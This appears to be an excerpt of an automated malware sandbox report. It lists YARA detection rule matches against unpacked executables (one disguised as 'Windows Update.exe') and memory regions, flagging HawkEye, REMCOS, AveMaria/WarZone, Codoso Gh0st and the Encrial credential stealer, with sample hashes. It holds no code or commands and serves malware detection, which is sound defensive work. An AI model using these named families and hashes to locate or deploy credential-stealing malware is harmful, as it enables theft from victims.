                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.921284802.0000000007700000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
